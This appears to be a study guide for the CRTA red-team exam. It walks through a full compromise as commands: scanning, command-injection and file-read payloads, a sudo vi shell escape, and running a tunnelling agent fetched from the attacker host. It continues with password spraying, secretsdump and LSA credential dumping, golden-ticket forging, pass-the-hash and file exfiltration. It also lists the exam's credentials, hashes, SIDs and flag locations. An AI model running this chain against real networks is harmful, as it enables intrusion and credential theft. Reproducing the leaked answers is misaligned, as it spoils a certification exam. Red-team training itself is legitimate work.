General Notes from CRTA Course

Red Team Operations Guide

Comprehensive Methodology
REFER TO: [Link]

CRTA Exam - Red Team Operations Guide

Final Attempt Preparation - Comprehensive Methodology

🎯 Exam Overview
Duration: 6 hours hands-on
Goal: Exfiltrate [Link] file from end servers
Attempts: 2 reverts available (use cautiously)
Target: External & Internal AD Red Teaming
Key Ports: 8091 (monitoring software), 23100 (file monitoring)

Phase 1: Information Gathering

Network Reconnaissance

# Full network scan

nmap -sS -sC -sV -p- -T4 --min-rate=7589 -vv [Link]/24

# Host discovery
nmap -sn [Link]/24

# Targeted scan for common ports

nmap -sS -sC -sV -p 22,80,443,8080,8091,23100 -T4 [Link]/24

# UDP scan for additional services

nmap -sU --top-ports 1000 -T4 [Link]/24
 # Service enumeration
nmap -sV --version-intensity 9 -p <discovered_ports> <target_ip>

Web Directory Enumeration

# Primary gobuster scan

gobuster dir -u [Link] -w
/usr/share/wordlists/dirbuster/[Link] -x
txt,php,conf,json,xml,bak --exclude-length 2759 -t 64

# Assets directory enumeration

gobuster dir -u [Link] -w
/usr/share/wordlists/dirbuster/[Link] -x
txt,php,conf,json,xml,bak --exclude-length 2759 -t 64

# Flags directory enumeration

gobuster dir -u [Link] -w
/usr/share/wordlists/dirbuster/[Link] -x
txt,php,conf,json,xml,bak --exclude-length 2759 -t 64

# Alternative wordlists
gobuster dir -u [Link] -w
/usr/share/wordlists/SecLists/Discovery/Web-Content/[Link] -x
txt,php,conf,json,xml,bak,css -t 64

# File-specific enumeration
gobuster dir -u [Link] -w
/usr/share/wordlists/SecLists/Discovery/Web-Content/[Link] -t
64

File and Credential Discovery

# Look for sensitive files

curl -s [Link]
curl -s [Link]
curl -s [Link]

# Base64 decode discovered credentials

echo "REJfUEBzc3cwcmQh" | base64 -d

# Check for AWS keys or other sensitive data

grep -i "AKIA" <discovered_files>
grep -i "secret" <discovered_files>
grep -i "password" <discovered_files>
Phase 2: Initial Access & Web Application Exploitation
HotHost Web Application

# Login attempts
curl -X POST [Link] -d
"username=admin&password=Very3stroungPassword" -H "Content-Type:
application/x-www-form-urlencoded"

# Check user roles

curl -s [Link] -H "Cookie: session=<session_cookie>"

# Route enumeration for system files

curl -s [Link]
curl -s [Link]

# Monitor system files route

curl -s "[Link]

Command Injection via Web Forms

# Test newsletter email field for command injection

# Intercept with Burp Suite and test payloads:
email=test@[Link]; whoami
email=test@[Link]; cat /etc/passwd
email=test@[Link]; id

# Look for command output in response

File System Access

# Direct file access via monitoring port

curl -s "[Link]
curl -s "[Link]

# Alternative payloads
curl -s "[Link]
curl -s "[Link]

# Log file enumeration

curl -s "[Link]
curl -s "[Link]
 curl -s "[Link]
url=[Link]

Phase 3: Privilege Escalation

User Enumeration

# Extract user information

curl -s "[Link] | grep app-
admin
curl -s "[Link]

# Check sudo privileges

curl -s "[Link]

# Common credential locations

curl -s "[Link]
admin/.bash_history"
curl -s "[Link]

Credential Discovery

# Known credentials from exam attempts

# app-admin: @dmin@123
# HotHost password: Very3stroungPassword
# sync_user: Summer@2025
# privilege: Admin@962

# Test SSH access

ssh app-admin@<target_ip>
ssh privilege@<target_ip>
# Password: @dmin@123 or Admin@962

# Check sudo capabilities

sudo -l
# Expected: /usr/bin/vi

Vi Privilege Escalation

# Once logged in as app-admin with vi sudo access

sudo /usr/bin/vi /etc/passwd
 # In vi, escape to shell
:!/bin/bash

# Alternative vi escalation
sudo /usr/bin/vi
:set shell=/bin/bash
:shell

Phase 4: Browser Data Mining & Network Discovery

Firefox Profile Analysis

# Find Firefox profiles

sudo find / -iname "*firefox*" 2>/dev/null
sudo find / -type d -name "*.default-release" 2>/dev/null

# Navigate to active profile

cd /home/privilege/.mozilla/firefox/[Link]-release

# Extract bookmarks and history

sqlite3 [Link]
sqlite> .tables
sqlite> select * from moz_bookmarks;

# Look for credentials in bookmarks

# Common pattern: [Link]

Log Analysis

# Analyze [Link] for IP addresses

grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" /var/log/[Link]
grep -i "10.10.10" /var/log/[Link]

# Common internal IP ranges to look for

grep -E "(10\.10\.10\.|172\.16\.|192\.168\.)" /var/log/[Link]

Phase 5: Network Pivoting & Lateral Movement

Method 1: Using Ligolo-ng
Ligolo Setup on Attacker Machine

# Attacker machine setup

wget [Link]
ng_proxy_0.4.3_Linux_64bit.[Link]
tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.[Link]
chmod +x proxy

wget [Link]
ng_agent_0.4.3_Linux_64bit.[Link]
tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.[Link]
chmod +x agent

# Network interface setup

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip route del [Link]/24 dev tun0
sudo ip link set ligolo up
sudo ip route add [Link]/24 dev ligolo

# Start proxy
./proxy -selfcert -laddr [Link]:443

Agent Deployment in Victim Machine

# Serve agent from attacker machine

python3 -m [Link] 8899

# Download and execute on victim

wget [Link]
./agent -connect [Link]:443 -ignore-cert

# Activate tunnel
session
list_tunnels
start

Secondary Target Enumeration

# Scan discovered network ([Link]/24)

nmap -v -sn [Link]/24 2>/dev/null
nmap -sS -sC -sV -p 445,3389,5985 [Link]/24
 # Identify key targets
# .2 - Domain Controller
# .30 - MGMT server
# .120 - Child Domain Controller

# Web service enumeration

curl -s [Link]
gobuster dir -u [Link] -w
/usr/share/wordlists/dirbuster/[Link] -x txt,php,html -
t 64

# Check for elfinder

curl -s [Link]
curl -s [Link]
curl -s [Link]

Method 2: Proxychains

Pivoting into Restricted Subnet with SSH +

Proxychains
Attack Box Network: [Link]/24
Accessible Machine (DC): [Link] (reachable via SSH with valid creds)
Target Subnet: [Link]/24 (only accessible through [Link] )

Goal: Use proxychains to pivot traffic into the [Link]/24 subnet.

Step 1: Create a Dynamic SOCKS Proxy via SSH

Run the following command from your attack box:

ssh -D 1080 -q -C -N user@[Link]

Step 2: Configure Proxychains

Edit the configuration file:

sudo nano /etc/[Link]
At the bottom, add:
[ProxyList] socks5 [Link] 1080

Step 3: Run Tools Through Proxychains

Now you can pivot into [Link]/24 using proxychains.

 proxychains nmap -sT -Pn [Link]/24

Example output: Discovered live host [Link]

proxychains nc -nv [Link] 445

proxychains nc -nv [Link] 80

Phase 6: SMB Password Spraying & Credential

Harvesting
Password Spraying with CrackMapExec

# Create target list

vim [Link]
[Link]
[Link]
[Link]

# Spray discovered credentials

crackmapexec --verbose smb [Link] -u john -p 'User1@#$%6'
crackmapexec --verbose smb [Link] -u corpmngr -p 'User4&*&*'

# Look for [Pwn3d!] indicators showing local admin access

### LSA Secrets Dumping
```bash
# Dump LSA secrets from compromised machine
crackmapexec --verbose smb [Link] -u john -p 'User1@#$%6' --lsa

# Extract clear-text passwords from output

# Look for: corpmngr:User4&*&*

# Update /etc/hosts for domain resolution

vim /etc/hosts
[Link] [Link] [Link]
[Link] [Link] [Link]

Phase 7: Active Directory Attacks

Domain Controller Discovery

# Identify Domain Controller

nslookup <domain_name>
dig <domain_name>

# Common DC IP from exam: [Link]

nmap -sS -sC -sV -p 88,135,139,389,445,636,3268,3269 [Link]

KRBTGT Hash Extraction

# Extract krbtgt hash from Child DC

impacket-secretsdump -debug child/corpmngr:'User4&*&*'@[Link]
-just-dc-user 'child\krbtgt'

# Expected output:
#
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900::
:
# krbtgt:aes256-cts-hmac-sha1-
96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2

SID Enumeration

# Extract Child domain SID

impacket-lookupsid child/corpmngr:'User4&*&*'@[Link]

# Extract Parent domain SID

impacket-lookupsid child/corpmngr:'User4&*&*'@[Link]

# Expected SIDs:
# Parent SID: S-1-5-21-3375883379-808943238-3239386119
# Child SID: S-1-5-21-3754860944-83624914-1883974761

Golden Ticket Forging

# Forge golden ticket

impacket-ticketer -domain [Link] -aesKey
ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid
S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid
S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
 # Export ticket
export KRB5CCNAME=[Link]

# Request service ticket

impacket-getST -k -no-pass -spn CIFS/[Link]
corpmngr@[Link]
export KRB5CCNAME=corpmngr@CIFS_dc01.[Link]@[Link]

Parent DC Compromise

# Extract Administrator hash from Parent DC

impacket-secretsdump -k -no-pass [Link] -just-dc-user
'warfare\Administrator' -debug

# Expected hash:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b2ab0552928c8399da5161a9eb7
f[Link]

# Access Parent DC
impacket-psexec -debug 'warfare/Administrator@[Link]' -hashes
aad3b435b51404eeaad3b435b51404ee:b2ab0552928c8399da5161a9eb7fd283

Kerberos Attacks

# ASREPRoast (if applicable)

impacket-GetNPUsers <domain>/<username> -no-pass -dc-ip [Link]

# Kerberoasting
impacket-GetUserSPNs <domain>/<username>:<password> -dc-ip [Link] -
request

# DCSync attack (if high privileges)

impacket-secretsdump <domain>/<username>:<password>@[Link]

# Extract krbtgt hash

impacket-secretsdump <domain>/<username>:<password>@[Link] | grep krbtgt

SMB Enumeration

# SMB shares enumeration

smbclient -L //[Link] -U <username>%<password>
smbmap -H [Link] -u <username> -p <password>
 # Access shares
smbclient //[Link]/C$ -U <username>%<password>
smbclient //[Link]/ADMIN$ -U <username>%<password>

Credential Extraction

# Using sync_user credentials

impacket-secretsdump <domain>/sync_user:Summer@2025@[Link]

# Look for Administrator hash

# Expected from exam: 3d15cb1141d579823f8bb08f1f23e316

# Pass-the-hash
impacket-psexec -hashes :3d15cb1141d579823f8bb08f1f23e316
Administrator@[Link]

Phase 8: Data Exfiltration

File System Navigation

# Navigate to Administrator desktop

cd C:\Users\Administrator\Desktop

# List files
dir
ls -la

# Look for [Link]

find . -name "[Link]" -type f
dir /s [Link]

# Alternative locations
cd C:\Users\Administrator\Documents
cd C:\temp
cd C:\Windows\Temp

File Transfer Methods

# SMB copy
copy [Link] \\<attacker_ip>\share\
 # Base64 encode and copy
certutil -encode [Link] secret_b64.txt
type secret_b64.txt

# PowerShell download
powershell -c "Invoke-WebRequest -Uri '[Link] -
OutFile 'C:\temp\[Link]'"

# Python HTTP server (on attacker)

python3 -m [Link] 8000

🔧 Essential Tools & Commands

Impacket Suite

# Install if needed
pip3 install impacket

# Key tools
impacket-secretsdump
impacket-psexec
impacket-smbexec
impacket-wmiexec
impacket-GetUserSPNs
impacket-GetNPUsers
impacket-ticketer
impacket-getST
impacket-lookupsid

Network Pivoting

# Ligolo-ng for network pivoting

# Chisel as alternative
# SSH tunneling for simple cases

Web Exploitation

# Burp Suite for manual testing

# OWASP ZAP for automated scanning
 # curl for quick requests
# gobuster for directory enumeration

Network Tools

# nmap for port scanning

# masscan for fast scanning
# netcat for connections
# proxychains for pivoting

SMB Tools

# crackmapexec for password spraying and lateral movement

# smbclient for share access
# smbmap for share enumeration

🎯 Key Exam Patterns

Common Credentials
HotHost: Very3stroungPassword
app-admin: @dmin@123
privilege: Admin@962
john: User1@#$%6
corpmngr: User4&&
sync_user: Summer@2025
Base64 encoded: REJfUEBzc3cwcmQh → DB_P@ssw0rd!

Common Ports
8091: NodeJS monitoring application
23100: File monitoring service
80/443: Web services
445: SMB
88: Kerberos

Common Files/Routes
 /assets: Static files directory
/pug: Template rendering (LFI vulnerable)
/elfinder: File manager
[Link]: Contains sensitive information
AD_Resources.txt: Contains sync_user credentials
[Link]: Firefox bookmarks and history

Common Paths
C:\Users\Administrator\Desktop: Final target location
/var/log/[Link]: Contains internal IP addresses
/etc/passwd: System users
Director of Engineering salary: 189500
/home/privilege/.mozilla/firefox/: Firefox profile data

Network Segments
[Link]/24: Initial external network
[Link]/24: First internal network
[Link]/24: Second internal network (requires pivoting)
[Link]/24: Final target network

⚠️ Critical Reminders
1. Time Management: 6 hours total - allocate wisely
2. Revert Attempts: Only 2 available - use carefully
3. Flag Order: Submit flags as you discover them
4. Documentation: Keep notes of working commands
5. Breaks: Take breaks to stay fresh
6. Final Goal: Exfiltrate [Link] file
7. Network Pivoting: Essential for accessing internal networks
8. Browser Data: Check Firefox profiles for additional credentials
9. SMB Spraying: Use crackmapexec for efficient credential testing
10. Golden Tickets: Master technique for AD privilege escalation

🚀 Execution Checklist
 Network scan ([Link]/24)
Identify monitoring software (port 8091)
Web directory enumeration
Find sensitive files ([Link], etc.)
Extract credentials and decode Base64
Access HotHost application
Exploit file inclusion vulnerabilities
Test command injection in web forms
Escalate privileges via app-admin
Mine Firefox browser data for credentials
Set up network pivoting (ligolo-ng)
Discover internal networks ([Link]/24)
SMB password spraying with crackmapexec
Dump LSA secrets for additional credentials
Access file manager (elfinder)
Extract sync_user credentials
Attack Domain Controller ([Link])
Extract krbtgt hash from Child DC
Perform SID enumeration
Forge Golden Ticket
Compromise Parent DC
Extract Administrator hash
Access Administrator desktop
Locate and exfiltrate [Link]

Good luck on your final attempt! Stay methodical and follow the patterns you've learned.